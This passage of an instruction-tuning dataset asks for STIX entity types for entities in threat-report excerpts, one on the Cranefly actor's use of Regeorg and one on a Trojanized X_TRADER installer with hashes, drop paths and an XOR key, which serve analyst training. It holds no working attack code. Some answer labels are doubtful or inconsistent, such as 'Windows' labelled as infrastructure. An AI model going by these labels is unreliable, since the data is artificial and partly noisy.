purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRegeorg\n\n---\n\n### Text Passage:\nAttribution\nHacktool.Regeorg has been used by multiple advanced persistent threat (APT) groups in the past, but as this code is publicly available on GitHub, its use does not offer sufficient clues for attribution. Symantec was unable to link this activity to any known groups.\nThe use of a novel technique and custom tools, as well as the steps taken to hide traces of this activity on victim machines, indicate that Cranefly is a fairly skilled threat actor. While we do not see data being exfiltrated from victim machines, the tools deployed and efforts taken to conceal this activity indicate that the most likely motivation for this group is intelligence gathering.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nHacktool\n\n---\n\n### Text Passage:\nAttribution\nHacktool.Regeorg has been used by multiple advanced persistent threat (APT) groups in the past, but as this code is publicly available on GitHub, its use does not offer sufficient clues for attribution. Symantec was unable to link this activity to any known groups.\nThe use of a novel technique and custom tools, as well as the steps taken to hide traces of this activity on victim machines, indicate that Cranefly is a fairly skilled threat actor. While we do not see data being exfiltrated from victim machines, the tools deployed and efforts taken to conceal this activity indicate that the most likely motivation for this group is intelligence gathering.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nWindows\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INFRASTRUCTURE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ntpmvscmgrsvr.exe\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\ncc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nmsvcr100.dll\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\naa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nTrojanized installer\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nTrading Technologies International, Inc.\n\n---\n\n### Text Passage:\nMalicious Installer\nThe infection chain starts with the Trojanized installer named X_TRADER_r7.17.90p608.exe (SHA256: 900b63ff9b06e0890bf642bdfcbfcc6ab7887c7a3c057c8e3fd6fba5ffc8e5d6), which is digitally signed by \"Trading Technologies International, Inc.\" and contains a malicious executable named Setup.exe. Our analysis of one version of this executable (SHA256: aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43) found that when executed, it examined the file named X_TRADER-ja.mst (also contained in the installer) for the following marker bytes at hardcoded offset 0x167000:\n* 5E DA F3 76\nIf the marker bytes are present, it creates a folder named:\n* C:\\Programdata\\TPM\nIt then copies the file C:\\Windows\\Sysnative\\immersivetpmvscmgrsvr.exe as C:\\Programdata\\TPM\\TpmVscMgrSvr.exe to the new folder.\nNext, it will drop two malicious DLLs:\n* C:\\Programdata\\TPM\\winscard.dll (SHA256: cc4eedb7b1f77f02b962f4b05278fa7f8082708b5a12cacf928118520762b5e2)\n* C:\\Programdata\\TPM\\msvcr100.dll (SHA256: d937e19ccb3fd1dddeea3eaaf72645e8cd64083228a0df69c60820289b1aa3c0)\nThe content of the dropped files is generated by decrypting chunks of the file X_TRADER-ja.mst mentioned earlier using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nTo achieve persistence on the victim\u2019s system, the malware invokes a CLSID_TaskScheduler COM object, possibly to create a scheduled task to run periodically the following file:\n* C:\\Programdata\\TPM\\TpmVscMgrSvr.exe\nSetup.exe then drops a file named X_TRADER.exe, also contained within the installer. The content of the dropped file is generated by decrypting chunks from one of its own portable executable resources starting at hardcoded offset 0x1CB40 using the XOR algorithm with the following key:\n* 74 F2 39 DA E5 CF\nSetup will then execute X_Trader.exe before deleting itself.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", 